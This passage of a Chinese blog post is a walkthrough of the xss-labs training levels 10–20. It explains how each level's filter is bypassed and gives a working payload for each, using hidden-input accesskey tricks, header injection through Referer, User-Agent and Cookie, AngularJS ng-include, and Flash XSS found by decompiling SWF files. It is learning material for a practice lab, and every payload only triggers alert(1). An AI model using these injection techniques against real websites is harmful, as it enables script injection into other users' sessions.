<p>t_sort才是可以xss的注入点。这一关也会过滤”&lt;”,可以用事件绕过:” onmouseover=”alert(1)”<br>        因为input是隐藏的，所以不会触发事件，需要通过其它方法触发，采用html的accesskey属性，不同的浏览器有不同的触发方式：<br>                (1)火狐是shift+ctrl+x（定义的）<br>                (2)Chrome alt+x<br>       加一个type=”text”来覆盖后面的hidden.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：t_sort=2&quot; accesskey=&quot;x&quot; onclick=&quot;alert(1)&quot; type=&quot;text&quot;</span><br></pre></td></tr></table></figure>

<h2 id="level-11"><a href="#level-11" class="headerlink" title="level-11"></a>level-11</h2><p>测试之后发现只有t_sort是真实接收数据的，回显在input表单内，type为hidden。还进行了html编码，无法闭合”。<br>看一下源码，发现接受处理的其实是referer参数，然后回显在t_ref上。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：Referer： &quot; type=&quot;text&quot; onclick=&quot;alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="level-12"><a href="#level-12" class="headerlink" title="level-12"></a>level-12</h2><p>看到一个t_ua字段，看来是抓包修改user-agent字段。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&quot; type=&quot;text&quot; onclick=&quot;alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="level-13"><a href="#level-13" class="headerlink" title="level-13"></a>level-13</h2><p>有t_cook字段，抓包修改cookie字段。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：Cookie: user=call+me+maybe%3F&quot; type=&quot;text&quot; onclick=&quot;alert(1);</span><br></pre></td></tr></table></figure>

<h2 id="level-14"><a href="#level-14" class="headerlink" title="level-14"></a>level-14</h2><p> 这题的外链挂了，看了网上的payload好像是上传一个可以xss的图片。exif xss。</p>
<h2 id="level-15"><a href="#level-15" class="headerlink" title="level-15"></a>level-15</h2><p>打开题目发现有提示，nginclude，原来使用了angular.min.js。符合sop策略。<br>AngularJS：ng-include 指令用于包含外部的 HTML 文件。，包含的内容将作为指定元素的子节点。<br>ng-include 属性的值可以是一个表达式，返回一个文件名。默认情况下，包含的文件需要包含在同一个域名下。<br>需要单引号包裹，否则变成注释。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：?src=&apos;level1.php?name=test&lt;img src=1 onerror=alert(1)&gt;&apos;</span><br></pre></td></tr></table></figure>

<h2 id="level-16"><a href="#level-16" class="headerlink" title="level-16"></a>level-16</h2><p>过滤空格，script，/，可以使用%0d或者%0a做分割符进行绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：?keyword=&lt;img%0Dsrc=1%0Donerror=alert(1)&gt;</span><br></pre></td></tr></table></figure>

<h2 id="level-17"><a href="#level-17" class="headerlink" title="level-17"></a>level-17</h2><p>输入点在url里面，输出点在embed标签内。<br>直接在embed标签插入onmouseover事件:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：?arg01=a&amp;arg02=b onmouseover=alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="level-18"><a href="#level-18" class="headerlink" title="level-18"></a>level-18</h2><p>做法同上。</p>
<h2 id="level-19"><a href="#level-19" class="headerlink" title="level-19"></a>level-19</h2><p>这题测试之后发现根本找不到回显点，查了网上的写法，属于flash-xss。<br>下载jpex对swf文件进行逆向。首先定位到getURL函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">                getURL(sIFR.instance.primaryLink,sIFR.instance.primaryLinkTarget); </span><br><span class="line">&#125;),new ContextMenuItem(&quot;Open link in new window&quot;,function() </span><br><span class="line">&#123; </span><br><span class="line">getURL(sIFR.instance.primaryLink,&quot;_blank&quot;); </span><br><span class="line">&#125;));</span><br></pre></td></tr></table></figure>

<p>然后定位到sIFR.VERSION： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if(_loc5_ &amp;&amp; _root.version != sIFR.VERSION) </span><br><span class="line">&#123; </span><br><span class="line">_loc4_ = sIFR.VERSION_WARNING.split(&quot;%s&quot;).join(_root.version); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>得知version参数可以传入loc4变量中，即sIFR的内容中，但是getURL只在内容为link时打开，所以分析contentIsLink函数:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">        function contentIsLink() </span><br><span class="line">&#123; </span><br><span class="line">return this.content.indexOf(&quot;&lt;a &quot;) == 0 &amp;&amp; (this.content.indexOf(&quot;&lt;a &quot;) == this.content.lastIndexOf(&quot;&lt;a &quot;) &amp;&amp; this.content.indexOf(&quot;&lt;/a&gt;&quot;) == this.content.length - 4); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>所以我们可以构造<a> </a> 标签来传值:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?arg01=version&amp;arg02=&lt;a href=&quot;javascript:alert(1)&quot;&gt;123&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p> 点击123即可成功。</p>
<h2 id="level-20"><a href="#level-20" class="headerlink" title="level-20"></a>level-20</h2><p>还是flash-xss。逆向出来的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">package </span><br><span class="line">&#123; </span><br><span class="line">import flash.display.LoaderInfo; </span><br><span class="line">import flash.display.Sprite; </span><br><span class="line">import flash.display.StageScaleMode; </span><br><span class="line">import flash.events.Event; </span><br><span class="line">import flash.events.MouseEvent; </span><br><span class="line">import flash.external.ExternalInterface; </span><br><span class="line">import flash.system.Security; </span><br><span class="line">import flash.system.System; </span><br><span class="line"> </span><br><span class="line">public class ZeroClipboard extends Sprite </span><br><span class="line">&#123; </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">private var button:Sprite; </span><br><span class="line"> </span><br><span class="line">private var id:String = &quot;&quot;; </span><br><span class="line"> </span><br><span class="line">private var clipText:String = &quot;&quot;; </span><br><span class="line"> </span><br><span class="line">public function ZeroClipboard() </span><br><span class="line">&#123; </span><br><span class="line">super(); </span><br><span class="line">stage.scaleMode = StageScaleMode.EXACT_FIT; </span><br><span class="line">Security.allowDomain(&quot;*&quot;); </span><br><span class="line">var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters; </span><br><span class="line">id = flashvars.id; </span><br><span class="line">button = new Sprite(); </span><br><span class="line">button.buttonMode = true; </span><br><span class="line">button.useHandCursor = true; </span><br><span class="line">button.graphics.beginFill(13434624); </span><br><span class="line">button.graphics.drawRect(0,0,Math.floor(flashvars.width),Math.floor(flashvars.height)); </span><br><span class="line">button.alpha = 0; </span><br><span class="line">addChild(button); </span><br><span class="line">button.addEventListener(MouseEvent.CLICK,clickHandler); </span><br><span class="line">button.addEventListener(MouseEvent.MOUSE_OVER,function(param1:Event):* </span><br><span class="line">&#123; </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;mouseOver&quot;,null); </span><br><span class="line">&#125;); </span><br><span class="line">button.addEventListener(MouseEvent.MOUSE_OUT,function(param1:Event):* </span><br><span class="line">&#123; </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;mouseOut&quot;,null); </span><br><span class="line">&#125;); </span><br><span class="line">button.addEventListener(MouseEvent.MOUSE_DOWN,function(param1:Event):* </span><br><span class="line">&#123; </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;mouseDown&quot;,null); </span><br><span class="line">&#125;); </span><br><span class="line">button.addEventListener(MouseEvent.MOUSE_UP,function(param1:Event):* </span><br><span class="line">&#123; </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;mouseUp&quot;,null); </span><br><span class="line">&#125;); </span><br><span class="line">ExternalInterface.addCallback(&quot;setHandCursor&quot;,setHandCursor); </span><br><span class="line">ExternalInterface.addCallback(&quot;setText&quot;,setText); </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;load&quot;,null); </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line">public function setHandCursor(param1:Boolean) : * </span><br><span class="line">&#123; </span><br><span class="line">button.useHandCursor = param1; </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line">private function clickHandler(param1:Event) : void </span><br><span class="line">&#123; </span><br><span class="line">System.setClipboard(clipText); </span><br><span class="line">ExternalInterface.call(&quot;ZeroClipboard.dispatch&quot;,id,&quot;complete&quot;,clipText); </span><br><span class="line">&#125; </span><br><span class="line"> </span><br><span class="line">public function setText(param1:*) : * </span><br><span class="line">&#123; </span><br><span class="line">clipText = param1; </span><br><span class="line">&#125; </span><br><span class="line">&#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上一关是getlURL，而这一关是ExternalInterface.call。首先通过LoaderInfo从URL中取值：<br>var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;<br>id = flashvars.id;<br>接下来构造payload就可以了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:arg01=id&amp;arg02=xss\&quot;))&#125;catch(e)&#123;alert(/xss/)&#125;//%26width=123%26height=123</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" <i class="fa fa-tag"> web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/28/XSS学习笔记/" rel="next" title="XSS学习笔记">
                <i class="fa fa-chevron-left"></i> XSS学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript">
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Horizon">
            
              <p class="site-author-name" itemprop="name">Horizon</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Horizoncy" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="imh0r1z0n.y@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://octoberfirst.github.io/" title="October's Blog" target="_blank">October's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lamber.xyz/" title="Lamber's Blog" target="_blank">Lamber's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://p3rh4ps.top/" title="P3rh4ps's Blog" target="_blank">P3rh4ps's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l0x1c.github.io/" title="L0x1c's Blog" target="_blank">L0x1c's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://5k1l.github.io" title="5K1L's Blog" target="_blank">5K1L's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aidaip.github.io/" title="Aidai's Blog" target="_blank">Aidai's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://da4er.top/" title="Da4er's Blog" target="_blank">Da4er's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/yesec" title="烨安's Blog" target="_blank">烨安's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://coinc1dens.github.io" title="Coinc1dens's Blog" target="_blank">Coinc1dens's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://vaala.cat" title="VaalaCat's Blog" target="_blank">VaalaCat's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://15h3na0.xyz/" title="15h3na0's Blog" target="_blank">15h3na0's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.lhyerror404.cn/" title="ERROR404's Blog" target="_blank">ERROR404's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in" title="glzjin's Blog" target="_blank">glzjin's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xmao.me" title="XMAO's Blog" target="_blank">XMAO's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://wordpress.jylsec.com/" title="姬扬灵's Blog" target="_blank">姬扬灵's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ch4ser.top" title="ch4ser's Blog" target="_blank">ch4ser's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://forever404.cn" title="Forever404's Blog" target="_blank">Forever404's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.gtfly.top" title="gtfly's Blog" target="_blank">gtfly's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://theseus.top" title="Theseus's Blog" target="_blank">Theseus's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nocbtm.github.io" title="Nocbtm's Blog" target="_blank">Nocbtm's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sunny250.github.io" title="晴天's Blog" target="_blank">晴天's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://palmer0801.github.io/" title="Palmer's Blog" target="_blank">Palmer's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lovei.org" title="腹黑's Blog" target="_blank">腹黑's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://62.234.155.106/wordpress" title="123qwer's Blog" target="_blank">123qwer's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://purecall.github.io/" title="VCT's Blog" target="_blank">VCT's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xz.aliyun.com/u/15779" title="VCT's XZ Blog" target="_blank">VCT's XZ Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://yikongge.github.io" title="小帽's Blog" target="_blank">小帽's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brucetg.github.io" title="Brucetg's Blog" target="_blank">Brucetg's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.jianshu.com/u/9c3ca1ca4784" title="Cyc1e's Blog" target="_blank">Cyc1e's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.jianshu.com/u/7343624d69c4" title="Fish_o0O's Blog" target="_blank">Fish_o0O's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://h01k.github.io" title="Hook's Blog" target="_blank">Hook's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://1660351753.github.io" title="cop's Blog" target="_blank">cop's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://anemone.top/" title="Anemone's Blog" target="_blank">Anemone's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://guokeya.github.io" title="过客's Blog" target="_blank">过客's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.ragdoll.work/" title="咲夜南梦's Blog" target="_blank">咲夜南梦's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://Altman.vip" title="Altman's Blog" target="_blank">Altman's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://soreatu.com/" title="Soreat_u's Blog" target="_blank">Soreat_u's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://iihthan.com/" title="姚曜凌's Blog" target="_blank">姚曜凌's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bertramc.cn/" title="berTrAM's Blog" target="_blank">berTrAM's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://rehml.cn/" title="花满楼's Blog" target="_blank">花满楼's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.chara.pub/blog" title="114's Blog" target="_blank">114's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="www.ximu.xyz" title="汐小白's Blog" target="_blank">汐小白's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00常见的标签利用"><span class="nav-number">1.</span> <span class="nav-text">0x00常见的标签利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#60-img-62-标签"><span class="nav-number">1.1.</span> <span class="nav-text">&lt;img&gt; 标签</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用-1"><span class="nav-number">1.1.1.</span> <span class="nav-text">XSS利用 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用2："><span class="nav-number">1.1.2.</span> <span class="nav-text">XSS利用2：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用3："><span class="nav-number">1.1.3.</span> <span class="nav-text">XSS利用3：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#60-a-62-标签"><span class="nav-number">1.2.</span> <span class="nav-text">&lt;a&gt; 标签</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#标准格式："><span class="nav-number">1.2.1.</span> <span class="nav-text">标准格式：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用1："><span class="nav-number">1.2.2.</span> <span class="nav-text">XSS利用1：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS-利用2："><span class="nav-number">1.2.3.</span> <span class="nav-text">XSS 利用2：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用3：-1"><span class="nav-number">1.2.4.</span> <span class="nav-text">XSS利用3：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS利用4："><span class="nav-number">1.2.5.</span> <span class="nav-text">XSS利用4：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#60-input-62-标签"><span class="nav-number">1.3.</span> <span class="nav-text">&lt;input&gt; 标签</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小技巧："><span class="nav-number">1.4.</span> <span class="nav-text">小技巧：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#当XSS遇到input-hidden属性"><span class="nav-number">1.4.1.</span> <span class="nav-text">当XSS遇到input hidden属性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#60-form-62-标签"><span class="nav-number">1.4.2.</span> <span class="nav-text">&lt;form&gt; 标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#60-iframe-62-标签"><span class="nav-number">1.4.3.</span> <span class="nav-text">&lt;iframe&gt; 标签</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-xss-labs-通关攻略"><span class="nav-number">2.</span> <span class="nav-text">0x01 xss-labs 通关攻略</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#level-1"><span class="nav-number">2.1.</span> <span class="nav-text">level-1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-2"><span class="nav-number">2.2.</span> <span class="nav-text">level-2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-3"><span class="nav-number">2.3.</span> <span class="nav-text">level-3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-4"><span class="nav-number">2.4.</span> <span class="nav-text">level-4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-5"><span class="nav-number">2.5.</span> <span class="nav-text">level-5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-6"><span class="nav-number">2.6.</span> <span class="nav-text">level-6</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-7"><span class="nav-number">2.7.</span> <span class="nav-text">level-7</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-8"><span class="nav-number">2.8.</span> <span class="nav-text">level-8</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-9"><span class="nav-number">2.9.</span> <span class="nav-text">level-9</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-10"><span class="nav-number">2.10.</span> <span class="nav-text">level-10</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-11"><span class="nav-number">2.11.</span> <span class="nav-text">level-11</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-12"><span class="nav-number">2.12.</span> <span class="nav-text">level-12</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-13"><span class="nav-number">2.13.</span> <span class="nav-text">level-13</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-14"><span class="nav-number">2.14.</span> <span class="nav-text">level-14</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-15"><span class="nav-number">2.15.</span> <span class="nav-text">level-15</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-16"><span class="nav-number">2.16.</span> <span class="nav-text">level-16</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-17"><span class="nav-number">2.17.</span> <span class="nav-text">level-17</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-18"><span class="nav-number">2.18.</span> <span class="nav-text">level-18</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-19"><span class="nav-number">2.19.</span> <span class="nav-text">level-19</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#level-20"><span class="nav-number">2.20.</span> <span class="nav-text">level-20</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=520716097&auto=1&height=66"></iframe>
    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Horizon</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共44.1k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

